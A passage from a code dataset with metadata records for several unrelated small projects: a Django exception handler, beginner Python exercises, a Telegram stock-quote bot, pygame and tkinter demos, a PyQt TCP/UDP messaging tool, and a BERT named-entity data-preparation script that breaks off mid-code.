sys.exit(main())\n","repo_name":"flutter/engine","sub_path":"testing/rules/run_gradle.py","file_name":"run_gradle.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":6866,"dataset":"github-code","pt":"37"} +{"seq_id":"22724900236","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author demo \n@file: views.py\n@time 2018/4/9 下午2:08\n\"\"\"\nfrom rest_framework.views import exception_handler\n\n\ndef custom_exception_handler(exc, context):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler(exc, context)\n\n if response is not None:\n if isinstance(response.data, dict):\n detail_data = response.data.get('detail')\n if detail_data:\n if isinstance(detail_data, list):\n detail_data = detail_data[0]\n elif isinstance(detail_data, dict):\n detail_data = detail_data.values()[0]\n response.data['detail'] = detail_data\n if isinstance(response.data, list):\n data = response.data\n\n response.data = {}\n response.data['detail'] = data[0]\n del data\n\n return response\n","repo_name":"guokaixin/django_my","sub_path":"src/django_my/common/utils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22648377810","text":"#Exercícios: Extras de Python\n#Crieumprogramaqueleiaquantodinheiroumapessoatemnacarteira,ecalculequantopoderiacomprardecadamoedaestrangeira.\n\n\"\"\" dinheiro = float(input(\"Digite a quantidade de dinheiro na carteira (em reais): \"))\n\nconversoes = {\n \"Dólar Americano\": 4.91,\n \"Peso Argentino\": 0.02,\n \"Dólar Australiano\": 3.18,\n \"Dólar Canadense\": 3.64,\n \"Franco Suíço\": 0.42,\n \"Euro\": 5.36,\n \"Libra Esterlina\": 6.21\n}\n\nprint(\"\\nQuantidade que poderia comprar de cada moeda estrangeira:\")\nfor moeda, taxa in conversoes.items():\n quantidade = dinheiro / taxa\n print(f\"{moeda}: {quantidade:.2f}\")\n \"\"\"\n#2. 
Escrevaumprogramaquepergunteaquantidadedekmpercorridosporum\n# carroalugadoeaquantidadedediaspelosquaiselefoialugado.Calculeopreçoapagar,sabendoqueocarrocustaR$80,00pordiaeR$0,20porkmrodado.\n\"\"\" km_percorridos = float(input(\"Digite a quantidade de km percorridos: \"))\ndias_aluguel = int(input(\"Digite a quantidade de dias de aluguel: \"))\n\npreco_por_dia = 80.00\npreco_por_km = 0.20\n\npreco_total = (preco_por_dia * dias_aluguel) + (preco_por_km * km_percorridos)\n\nprint(\"O preço total a pagar é: R$\", preco_total) \"\"\"\n\n#3.Façaumalgoritmoqueleiaosaláriodeumfuncionárioemostreseunovosalário.\n\"\"\" \nsalario = float(input(\"Digite o salário do funcionário: \"))\n\nif salario <= 1000.00:\n novo_salario = salario * 1.20 # 20% de aumento\nelif salario <= 2800.00:\n novo_salario = salario * 1.10 # 10% de aumento\nelse:\n novo_salario = salario * 1.05 # 5% de aumento\n\nprint(\"Novo salário: R$\", novo_salario) \"\"\"\n\n#4. CrieumprogramaquetenhaafunçãoleiaInt(),quevaifuncionardeformasemelhanteàfunçãoinput()doPython,\n# sóquefazendoavalidaçãoparaaceitarapenasumvalornúmerico\n\nwhile True:\n try:\n numero = int(input(\"Digite um número inteiro: \"))\n break # Sai do loop se um valor válido for inserido\n except ValueError:\n print(\"Erro: Digite um valor numérico válido.\")\n\nprint(f\"Você digitou: {numero}\")","repo_name":"otilliasantos0411/Desafios-bootcamp-back-end-PythoneDjango","sub_path":"Desafio 1- primeira semana/Exercicio-extra.py","file_name":"Exercicio-extra.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30065662754","text":"from telegram.ext.updater import Updater\nfrom telegram.update import Update\nfrom telegram.ext.callbackcontext import CallbackContext\nfrom telegram.ext.commandhandler import CommandHandler\nfrom telegram.ext.messagehandler import MessageHandler\nfrom telegram.ext.filters import Filters\nimport requests\nimport urllib.parse\nimport os\n\ntoken = os.getenv(\"token\")\nsymbol = \"\"\nupdater = Updater(token, use_context=True)\n\n\ndef start(update: Update, context: CallbackContext):\n\tupdate.message.reply_text(\n\t\t\"Enter stock symbol to get quote\")\n\ndef help(update: Update, context: CallbackContext):\n\tupdate.message.reply_text(\"\"\"\n Enter stock symbol to get current price.\n\t\n\t\"\"\")\n\ndef lookup(symbol):\n \"\"\"Look up quote for symbol.\"\"\"\n \n # Contact API\n try:\n api_key = os.getenv(\"API_KEY\")\n url = f\"https://cloud.iexapis.com/stable/stock/{urllib.parse.quote_plus(symbol)}/quote?token={api_key}\"\n response = requests.get(url)\n response.raise_for_status()\n except requests.RequestException:\n pass\n\n # Parse response\n try:\n quote = response.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"]\n }\n except (KeyError, TypeError, ValueError):\n return {\n \"name\": \"Invalid\",\n \"price\": \"Invalid\",\n \"symbol\": \"Invalid\"\n }\n\ndef getQuote(update: Update, context: CallbackContext):\n global symbol\n symbol = update.message.text\n # update.message.reply_text(\"Sorry '%s' is not a valid command\" % update.message.text)\n quote = lookup(symbol)\n price = quote[\"name\"] + \" stock: $\"+ str(quote[\"price\"])\n update.message.reply_text(price)\n \n\n\ndef unknown_text(update: Update, context: CallbackContext):\n\tupdate.message.reply_text(\n\t\t\"Sorry I can't recognize you , you said '%s'\" % 
update.message.text)\n\n\nupdater.dispatcher.add_handler(CommandHandler('start', start))\n# updater.dispatcher.add_handler(CommandHandler('tesla', stock_quote))\nupdater.dispatcher.add_handler(CommandHandler('help', help))\n\nupdater.dispatcher.add_handler(MessageHandler(Filters.text, getQuote))\nupdater.dispatcher.add_handler(MessageHandler(\n\tFilters.command, getQuote)) # Filters out unknown commands\n\n# Filters out unknown messages.\nupdater.dispatcher.add_handler(MessageHandler(Filters.text, unknown_text))\n\nupdater.start_polling()\n","repo_name":"1basilisk/tgBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19222326562","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 9 09:35:01 2020\n\n@author: ASUS\n\"\"\"\n\n\nimport tkinter\nPythonGUI = tkinter.Tk()\nPythonGUI.geometry('640x480') # 設定主視窗預設尺寸為640x480\nPythonGUI.resizable(False,False) # 設定主視窗的寬跟高皆不可縮放\nPythonGUI.title('GUI test') # 設定主視窗標題\n\n# Code to add widgets will go here...\nPythonGUI.mainloop()\n\n","repo_name":"Arwen0905/Python_Test","sub_path":"Python_GUI/Python GUI/參考程式碼/tkinter_window_set.py","file_name":"tkinter_window_set.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36586766209","text":"import sys,ctypes,inspect,time,socket,threading,os,re\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore\n\nfrom ui import MainView\nfrom Logiclayer import tcp_server,tcp_client,web_server,auto_response\nfrom Logiclayer import stop_threading\nfrom pynput.keyboard import Key,Controller\n\nclass Tcp_nhs(QMainWindow,tcp_server.Tcp_server,tcp_client.Tcp_client,web_server.Web_server,auto_response.Auto_resp):\n signal_write_msg = QtCore.pyqtSignal(str)\n _translate = QtCore.QCoreApplication.translate\n def __init__(self,parent = None):\n super(Tcp_nhs,self).__init__(parent)\n\n self.tcp_socket = None\n self.udp_socket = None\n self.setupUi(self)\n self.defaultInit()\n self.connect()\n self.Setsocket()\n\n\n def Setsocket(self):\n # 创建TCP/UDP套接字\n self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # 将TCP套接字四次挥手后的TIME_WAIT状态取消\n self.tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # 使用socket模块获取本机ip\n MY_IP = socket.gethostbyname(socket.gethostname())\n if self.comboBox.currentIndex() == 5:\n self.lineEdit_2.setText('')\n else:\n self.lineEdit_2.setText(str(MY_IP))\n\n def defaultInit(self):\n self.pushButton_3.setEnabled(False)\n self.pushButton_8.hide()\n self.plainTextEdit.setReadOnly(False)\n self.label_3.hide()\n self.lineEdit_4.hide()\n self.progressBar.hide()\n\n\n #绑定触发事件\n def connect(self):\n self.signal_write_msg.connect(self.write_msg)\n self.pushButton.clicked.connect(self.click_btn1)\n self.pushButton_2.clicked.connect(self.click_btn2)\n self.actioncs.triggered.connect(self.click_actioncs)\n self.actionout.triggered['bool'].connect(self.close)\n # self.actionxinjian.triggered.connect(self.createView)\n self.pushButton_3.clicked.connect(self.click_btn3)\n self.pushButton_4.clicked.connect(self.click_btn4)\n # self.pushButton5.clicked.connect(self.click_btn5)\n # self.pushButton_4.grabKeyboard(self.keycente)\n self.pushButton_6.clicked.connect(self.click_btn6)\n self.pushButton_8.clicked.connect(self.click_btn8)\n 
self.comboBox.currentIndexChanged.connect(self.click_box)\n\n def write_msg(self,msg):\n \"\"\"\n 功能函数,向接收区写入数据的方法\n 信号-槽触发\n tip:PyQt程序的子线程中,使用非规定的语句向主线程的界面传输字符是不允许的\n :return: None\n \"\"\"\n self.textBrowser_2.insertPlainText(msg)\n self.textBrowser_2.moveCursor(self.textBrowser_2.textCursor().End)\n #重新获取ip\n def click_btn1(self):\n self.lineEdit_2.clear()\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('8.8.8.8', 80))\n MY_IP = s.getsockname()[0]\n self.lineEdit_2.setText(str(MY_IP))\n except Exception as error:\n try:\n MY_IP = socket.gethostbyname(socket.gethostname())\n self.lineEdit_2.setText(str(MY_IP))\n except Exception as err:\n self.signal_write_msg.emit(\"无法获取ip,请连接网络!\\n\")\n finally:\n s.close()\n #连接网络\n def click_btn2(self):\n\n if self.comboBox.currentIndex() == 0:\n self.tcp_server_start()\n if self.comboBox.currentIndex() == 1:\n self.tcp_client_start()\n if self.comboBox.currentIndex() == 4:\n self.web_server_start()\n self.link = True\n self.pushButton_3.setEnabled(True)\n\n # 断开网络\n def click_btn3(self):\n self.close_socket()\n self.link = False\n # 重置数据\n def reset(self):\n \"\"\"\n 功能函数,将按钮重置为初始状态\n :return:None\n \"\"\"\n self.link = False\n self.client_socket_list = list()\n self.pushButton_3.setEnabled(False)\n self.pushButton_2.setEnabled(True)\n self.plainTextEdit.setReadOnly(False)\n\n def close_socket(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n if self.comboBox.currentIndex() == 0 or self.comboBox.currentIndex() == 1:\n self.tcp_close()\n if self.comboBox.currentIndex() == 2 or self.comboBox.currentIndex() == 3:\n self.udp_close()\n if self.comboBox.currentIndex() == 4:\n self.web_close()\n self.reset()\n\n def tcp_close(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n if self.comboBox.currentIndex() == 0:\n try:\n for client, address in self.client_socket_list:\n client.close()\n self.tcp_socket.close()\n if self.link is True:\n self.signal_write_msg.emit('已断开网络\\n')\n except Exception as ret:\n pass\n if self.comboBox.currentIndex() == 1:\n try:\n self.tcp_socket.close()\n if self.link is True:\n self.signal_write_msg.emit('已断开网络\\n')\n except Exception as ret:\n pass\n try:\n stop_threading.stop_thread(self.server_threading)\n except Exception:\n pass\n try:\n stop_threading.stop_thread(self.client_threading)\n except Exception:\n pass\n\n def udp_close(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n if self.comboBox.currentIndex() == 2:\n try:\n self.udp_socket.close()\n if self.link is True:\n msg = '已断开网络\\n'\n self.signal_write_msg.emit(msg)\n except Exception as ret:\n pass\n if self.comboBox.currentIndex() == 3:\n try:\n self.udp_socket.close()\n if self.link is True:\n msg = '已断开网络\\n'\n self.signal_write_msg.emit(msg)\n except Exception as ret:\n pass\n try:\n stop_threading.stop_thread(self.server_threading)\n except Exception:\n pass\n try:\n stop_threading.stop_thread(self.client_threading)\n except Exception:\n pass\n\n def web_close(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n try:\n for client, address in self.client_socket_list:\n client.send('WEB服务端已断开网络\\n')\n client.close()\n self.tcp_socket.close()\n if self.link is True:\n msg = '已断开网络\\n'\n self.signal_write_msg.emit(msg)\n except Exception as ret:\n pass\n try:\n stop_threading.stop_thread(self.server_threading)\n except Exception:\n pass\n try:\n stop_threading.stop_thread(self.client_threading)\n except Exception:\n pass\n #发送消息\n def click_btn4(self):\n if self.comboBox.currentIndex() == 5:\n self.SearchWeChat()\n 
self.progress_start()\n elif self.link is False:\n self.signal_write_msg.emit( '请选择服务,并点击连接网络\\n')\n self.plainTextEdit.setPlainText('')\n else:\n try:\n msg = (str(self.plainTextEdit.toPlainText())).encode('utf-8')\n txt = str(self.plainTextEdit.toPlainText())\n if self.comboBox.currentIndex() == 0:\n for client,address in self.client_socket_list:\n client.send(msg)\n self.signal_write_msg.emit('TCP服务端:%s\\n' % txt)\n self.plainTextEdit.setPlainText('')\n if self.comboBox.currentIndex() == 1:\n self.tcp_socket.send(msg)\n self.signal_write_msg.emit('TCP客户端:%s\\n' % txt)\n self.plainTextEdit.setPlainText('')\n if self.comboBox.currentIndex() == 4:\n self.web_send()\n\n except Exception as res:\n self.signal_write_msg.emit(\"发送失败,请查看网络\\n\")\n self.plainTextEdit.setPlainText('')\n\n\n # 清除信息\n def click_btn6(self):\n self.textBrowser_2.clear()\n # 选择服务端\n def click_box(self):\n self.pushButton_8.hide()\n self.lineEdit_3.setText('')\n self.plainTextEdit.setReadOnly(False)\n self.pushButton_2.setEnabled(True)\n self.pushButton_3.setEnabled(True)\n self.pushButton.setEnabled(True)\n if self.comboBox.currentIndex() == 0 or self.comboBox.currentIndex() == 2:\n self.label_3.hide()\n self.lineEdit_4.hide()\n self.label.setText(self._translate(\"TCP-UDP\", \"本地IP地址:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"端口号:\"))\n if self.comboBox.currentIndex() == 1 or self.comboBox.currentIndex() == 3:\n self.label_3.show()\n self.lineEdit_4.show()\n\n self.label.setText(self._translate(\"TCP-UDP\", \"本地IP地址:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"目标端口:\"))\n if self.comboBox.currentIndex() == 4:\n self.pushButton_8.show()\n self.plainTextEdit.setReadOnly(True)\n self.label_3.hide()\n self.lineEdit_4.hide()\n self.label.setText(self._translate(\"TCP-UDP\", \"本地IP地址:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"端口号:\"))\n if self.comboBox.currentIndex() == 5:\n self.pushButton.setEnabled(False)\n self.label.setText(self._translate(\"TCP-UDP\", \"微信名称:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"倒计时(秒):\"))\n # self.plainTextEdit.setReadOnly(True)\n self.link = True\n self.lineEdit_2.setText('')\n self.label_3.hide()\n self.pushButton_2.setEnabled(False)\n self.pushButton_3.setEnabled(False)\n self.lineEdit_4.hide()\n\n def textBrowser2(self):\n # self.textBrowser_2.insertPlainText(self.msg)\n print('ssssssss')\n # 查询端口\n def click_actioncs(self):\n self.Makeport()\n # def createView(self):\n # self.newView =Ui_MainWindow()\n # self.newView.setupUi()\n\n def Makeport(self):\n # port_list = []\n # port_dict = {\"data\": None}\n cmd = 'netstat -ano'\n local_ports = os.popen(cmd).readlines()\n for port in local_ports:\n self.signal_write_msg.emit(port.replace(\"\\n\", \"\"))\n\n local_ports.close()\n # pdict[\"TCP_PORT\"] = port.replace(\"\\n\", \"\")\n # port_list.append(pdict)\n # port_dict[\"data\"] = port_list\n # jsonStr = json.dumps(port_dict, sort_keys=True, indent=4)\n #\n # print(jsonStr)\n\n # 选择文件\n\n def click_btn8(self):\n self.choseFile()\n\n def keyPressEvent(self, event):\n # print(Qt.Key_Enter)\n # print(event.key())\n if event.key() == 16777220:\n print('sss')\n\n\n# 线程\nclass StopThreading:\n \"\"\"强制关闭线程的方法\"\"\"\n @staticmethod\n def _async_raise(tid, exc_type):\n tid = ctypes.c_long(tid)\n if not inspect.isclass(exc_type):\n exc_type = type(exc_type)\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exc_type))\n if res == 0:\n raise ValueError(\"invalid thread id\")\n elif res != 1:\n 
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\n\n def stop_thread(self, thread):\n self._async_raise(thread.ident, SystemExit)\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Tcp_nhs()\n demo.show()\n sys.exit(app.exec_())","repo_name":"Mirefire/Msgpyqt","sub_path":"DemoMenu.py","file_name":"DemoMenu.py","file_ext":"py","file_size_in_byte":12297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15645342260","text":"import random\nimport pygame\n\npygame.init()\n\nres = (300,300)\nwin = pygame.display.set_mode(res)\npygame.display.set_caption(\"Block Shooter\")\nfr = pygame.time.Clock()\ncBlack = (0,0,0)\ncRed = (255,0,0)\ncGreen = (0,255,0)\ncBlue = (0,0,255)\ncWhite = (255,255,255)\n\nx=25\ny=275\nx1=x\ny1=y\nx2=0\ny2=0\nwidth=25\nheight=25\nvel = 10\nrun = True\nmfont = pygame.font.Font('comicz.ttf', 20)\n\ndef renderonwin():\n\twin.fill(cBlack)\n\ttext = mfont.render(\"Score :\" + str(Score),True,cWhite)\n\twin.blit(text,(145,0))\n\tshoot()\n\tenemy()\n\tpygame.draw.rect(win,cBlue,(x,y,width,height))\n\n\tpygame.display.update()\n\ndef enemy():\n\tpygame.draw.rect(win,cRed,(x2,y2,20,20))\n\ndef shoot():\n\tpygame.draw.rect(win,cWhite,(x1,y1,10,10))\n\nbullet = True\nenemydead = True\nScore = 0\n\n\nwhile run:\n\tfr.tick(30)\n\tif enemydead == True:\n\t\tx2 = random.randint(0,270)\n\t\ty2 = random.randint(75,100)\n\n\tenemydead = False\n\t\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trun = False\n\tkeyp = pygame.key.get_pressed()\n\n\tif bullet == True:\n\t\tif y1 > 0:\n\t\t\ty1 -= vel\n\t\telse:\n\t\t\tbullet = False\n\n\tif y1 >= y2 and y1 <= y2+20:\n\t\tif x1 >= x2 and x1 <= x2+20:\n\t\t\tScore += 1\n\t\t\tenemydead = True\n\n\n\tif keyp[pygame.K_SPACE]:\n\t\tx1=x\n\t\ty1=y\n\t\tbullet = True\n\n\tif keyp[pygame.K_RIGHT]:\n\t\tif x < res[1]-width:\n\t\t\tx += vel\n\tif keyp[pygame.K_LEFT]:\n\t\tif x > 0:\n\t\t\tx -= vel\n\n\trenderonwin()\npygame.quit()","repo_name":"DocMonster7/Block-Shooters","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71516232747","text":"\"\"\"Summary\n\"\"\"\nfrom .base import JobPostingsConnection\n\n\nclass UKPostingsConnection(JobPostingsConnection):\n \"\"\"docstring for UKPostingsConnection\n\n Attributes:\n base_url (str): Description\n scope (str): Description\n token (str): Description\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Summary\n \"\"\"\n super().__init__()\n self.base_url = \"https://emsiservices.com/uk-jpa/\"\n self.scope = \"postings:uk\"\n\n self.get_new_token()\n\n self.name = \"UK_Postings\"\n","repo_name":"calebjcourtney/EmsiApiPy","sub_path":"apis/unitedKingdomPostings.py","file_name":"unitedKingdomPostings.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40519083621","text":"def tuplas_diccionario(lista_tuplas):\r\n\tdict = {}\r\n\tfor i,j in lista_tuplas:\r\n\t\tif i in dict:\r\n\t\t\tdict[i].append(j)\r\n\t\telse:\r\n\t\t\tdict[i] = j.split(\",\")\r\n\treturn dict\r\n\t\r\ndef contar_palabras(cadena):\r\n\tlista_palabras = cadena.split()\r\n\tdict = {}\r\n\tfor i in lista_palabras:\r\n\t\tif i in dict:\r\n\t\t\tdict[i] += 1\r\n\t\telse:\r\n\t\t\tdict[i] = 1\r\n\treturn dict\r\n\t\r\ndef 
contar_letras(cadena):\r\n\tlista_letras = list(cadena)\r\n\tdict = {}\r\n\tfor i in lista_letras:\r\n\t\tif i in dict:\r\n\t\t\tdict[i] += 1\r\n\t\telse:\r\n\t\t\tdict[i] = 1\r\n\treturn dict\r\n\r\ndef usar_agenda(agenda):\r\n\twhile True:\r\n\t\tnombre = input(\"El numero de quien desea ver/agendar: \")\r\n\t\tif nombre == \"*\":\r\n\t\t\treturn\r\n\t\tif nombre in agenda:\r\n\t\t\tprint(agenda[nombre])\r\n\t\telse:\r\n\t\t\tagenda[nombre] = input(\"Ingrese num\")","repo_name":"FdelMazo/7540rw-Algo1","sub_path":"Ejercicios de guia/unidad9.py","file_name":"unidad9.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7730955978","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport json\nimport re\nimport torch\nfrom pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM, BasicTokenizer\nimport os\n\nbasicTokenizer = BasicTokenizer()\n\nMAX_SENT_LENGTH = 200\n\n# 加载词典 pre-trained model tokenizer (vocabulary)\nVOCAB = './bert-large-cased-vocab.txt'\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n\n\ndef match_brackets(s, i):\n if s[i] == '(':\n end_bracket = ')'\n elif s[i] == '[':\n end_bracket = ']'\n elif s[i] == '{':\n end_bracket = '}'\n elif s[i] == '<':\n end_bracket = '>' # Introduce this for start-end match\n else:\n raise ValueError('Not match')\n i += 1\n while True:\n if s[i] == end_bracket:\n return i + 1\n else:\n i = match_brackets(s, i)\n\ndef is_match(s):\n try:\n s = ''.join(c for c in s if c in ('(','[','{','}',']',')'))\n match_brackets('<' + s + '>', 0)\n except ValueError:\n return False\n else:\n return True\n\n# {\"originalText\": \"印度海军近日从“加尔各答”级驱逐舰上试射了由印度和以色列联合研制的远程面空导弹?试验在位于印度西海岸的“加尔各答”级驱逐舰上进行?试验中,该导弹成功拦截了一个增程型空中目标?此次试验的“巴拉克”-8导弹由印度国防研究与发展局?以色列航空工业公司?以色列武器研发与技术基础设施管理局?埃尔塔系统公司?拉法尔公司等机构联合研制?\",\n# \"entities\": [{\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 8, \"end_pos\": 17}, {\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 34, \"end_pos\": 39}, {\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 80, \"end_pos\": 86}, {\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 93, \"end_pos\": 101}]}\n\n# {\"entity\": \"bimagrumab\", \"type\": \"Drug\", \"start\": 35, \"end\": 45}\n\ndef generate_train_json(data_sign):\n if data_sign == \"train\":\n file_path = '../origin_data/new_train.json'\n elif data_sign == \"val\" or data_sign == \"val_test\":\n file_path = '../origin_data/new_val.json'\n else:\n return None\n fr = open(file_path, 'r', encoding='utf-8')\n datas = []\n entity_type = set()\n index = 0\n for line in fr:\n index += 1\n # if index > 100:\n # break\n line = json.loads(line)\n if data_sign == 'train':\n text = line['text'].replace('\\t', '.')\n entities = line['entities']\n if data_sign == 'val':\n text = line['text'].replace('\\t', '.')\n entities = []\n else:\n text = line['text']\n entities = []\n\n context_list = text.split('. ')\n token_lens = [len(tokenizer.tokenize(contexts)) for contexts in context_list]\n\n index = 0\n while index < len(token_lens):\n while index + 1 < len(token_lens) and token_lens[index] + token_lens[index + 1] < MAX_SENT_LENGTH:\n token_lens[index] += token_lens[index + 1]\n del token_lens[index + 1]\n context_list[index] = context_list[index] + '. 
' + context_list[index + 1]\n del context_list[index + 1]\n index += 1\n\n entity_dict = {}\n label = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n label_entity = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n label_entity_ = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n label_entity__ = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n # 使用空格切分\n tokenized_text = basicTokenizer.tokenize(text)\n entity_str_list = []\n for i in entities:\n # entity_dict['label_type'] = i['type']\n # entity_dict['overlap'] = 0\n # entity_dict['start_pos'] = i['start']\n # entity_dict['end_pos'] = i['end']\n entity_type.add(i['type'])\n\n entity_str = text[i['start']: i['end']]\n entity_list = basicTokenizer.tokenize(entity_str)\n start_text = basicTokenizer.tokenize(text[: i['start']])\n start = len(start_text)\n end = start + len(entity_list)\n\n label[i['type']].append(str(start) + ',' + str(end))\n label_entity[i['type']].append(text[i['start']: i['end']])\n label_entity_[i['type']].append(tokenized_text[start: end])\n\n entity_str_list.append(entity_str)\n datas.append(\n {\n # \"entity_str_list\": entity_str_list,\n 'context': text,\n # 'tokenized_text': tokenized_text,\n 'label': label,\n 'label_entity': label_entity,\n # 'label_entity_': label_entity_,\n }\n )\n return datas\n\n\ndef generate_process_data():\n datas_train = generate_train_json(\"train\")\n # i = int(len(datas_train) / 2)\n # datas_train = datas_train[:i]\n # datas_val = generate_train_json(\"val\")\n # i = int(len(datas_val) / 3)\n # datas_val = datas_val[6000:8000]\n # datas_val = generate_train_json(\"val_test\")\n\n with open('train.json', 'w', encoding='utf-8') as file_obj:\n json.dump(datas_train, file_obj, ensure_ascii=False)\n # with open('val.json', 'w', encoding='utf-8') as file_obj:\n # json.dump(datas_val, file_obj, ensure_ascii=False)\n # with open('val_test.json', 'w', encoding='utf-8') as file_obj:\n # json.dump(datas_val, file_obj, ensure_ascii=False)\n print('保存成功')\n\n\ndef caculate_vocab_num():\n fr = open('../origin_data/new_train.json', 'r', encoding='utf-8')\n\n step = 0\n sets = set()\n lists = []\n\n for line in fr:\n # step += 1\n # if step == 50:\n # break\n line = json.loads(line)\n i = line['text']\n ins = i.split('\\t')\n strs1 = []\n for j in ins:\n strs1 = j.split(' ')\n for z in strs1:\n if z.replace('.', '').replace(',', '') not in tokenizer.vocab:\n if not (bool(re.search(r'\\d', z)) or (':' in z) or ('!' 
in z)):\n sets.add(z.replace('.', '').replace(',', ''))\n lists.append(z.replace('.', '').replace(',', ''))\n\n list_dict = {}\n for i in lists:\n if i not in list_dict.keys():\n list_dict[i] = 1\n else:\n list_dict[i] = list_dict[i] + 1\n\n list_1 = []\n list_10 = []\n list_50 = []\n list_100 = []\n list_1000 = []\n\n for key, value in list_dict.items():\n if value < 10:\n list_1.append(key)\n elif 10 <= value < 50:\n list_10.append(key)\n elif 50 <= value < 100:\n list_50.append(key)\n elif 100 <= value < 1000:\n list_100.append(key)\n else:\n list_1000.append(key)\n\n print(list_dict)\n\n with open('train.json', 'w', encoding = 'utf-8') as file_obj:\n json.dump(i, file_obj,ensure_ascii=False, indent=4)\n\n print('保存成功')\n\n\ndef caculate_sent_num():\n fr = open('../origin_data/new_train.json', 'r', encoding='utf-8')\n\n lists = []\n\n num_100 = 0\n num_200 = 0\n num_300 = 0\n num_400 = 0\n num_500 = 0\n\n for line in fr:\n line = json.loads(line)\n i = line['text']\n ins_len = re.split(r\"[ \\t]\", i)\n\n ins = i.split('\\t')\n ins_num = len(ins)\n\n lists.append({'text': i,\n 'ins': ins,\n 'ins_len': ins_len,\n 'ins_num': ins_num\n })\n\n if 200 > len(ins_len) > 100:\n num_100 += 1\n if 300 > len(ins_len) > 200:\n num_200 += 1\n if 400 > len(ins_len) > 300:\n num_300 += 1\n if 500 > len(ins_len) > 400:\n num_400 += 1\n if len(ins_len) > 256:\n num_500 += 1\n\n print(num_100)\n print(num_200)\n print(num_300)\n print(num_400)\n print(num_500)\n print('stop')\n\ndef caculate_sent_num_for_bert():\n fr = open('../origin_data/new_train.json', 'r', encoding='utf-8')\n\n lists = []\n\n num_10 = 0\n num_100 = 0\n num_200 = 0\n num_300 = 0\n num_400 = 0\n num_500 = 0\n\n for line in fr:\n line = json.loads(line)\n i = line['text']\n if \"\\t\" in i:\n print(\"stop\")\n ins_len = tokenizer.tokenize(i)\n\n if 100 > len(ins_len) > 0:\n num_10 += 1\n if 200 > len(ins_len) > 100:\n num_100 += 1\n if 300 > len(ins_len) > 200:\n num_200 += 1\n if 400 > len(ins_len) > 300:\n num_300 += 1\n if 500 > len(ins_len) > 400:\n num_400 += 1\n if len(ins_len) > 500:\n num_500 += 1\n\n print(num_10)\n print(num_100)\n print(num_200)\n print(num_300)\n print(num_400)\n print(num_500)\n print('stop')\n\ndef generate_result():\n fr1 = open('result.json', 'r', encoding='utf-8')\n span_triple_lst = json.load(fr1)\n fr2 = open('val_test.json', 'r', encoding='utf-8')\n lines = json.load(fr2)\n\n # span_triple_lst = span_triple_lst[:80]\n # lines = lines[:10]\n\n sent_list = []\n for line in lines:\n for i in 